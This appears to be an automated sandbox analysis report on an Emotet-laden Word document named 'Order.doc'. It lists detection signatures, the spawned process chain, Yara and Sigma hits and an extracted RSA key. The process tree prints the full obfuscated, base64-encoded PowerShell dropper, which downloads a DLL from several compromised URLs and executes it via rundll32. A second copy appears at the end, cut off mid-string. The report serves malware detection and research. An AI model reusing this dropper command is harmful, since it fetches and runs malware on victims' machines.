Loading ...

Play interactive tourEdit tour

Analysis Report Order.doc

Overview

General Information

Sample Name:Order.doc
Analysis ID:344065
MD5:1a0ae833990a558910254e9bebfaeeaf
SHA1:c6f348043fb590f9638ed792a331695475b79af1
SHA256:5648715fe9ed7418d2d2b101a4ae8f4bb814ac68e422f78641595b37a83eb84e
Tags:Heodo

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1028 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2424 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2444 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2488 cmdline: powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2504 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 1296 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2868 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2700 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.rundll32.exe.320000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              9.2.rundll32.exe.210000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                7.2.rundll32.exe.400000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  10.2.rundll32.exe.280000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    12.2.rundll32.exe.260000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1296, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, ProcessId: 2756
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKA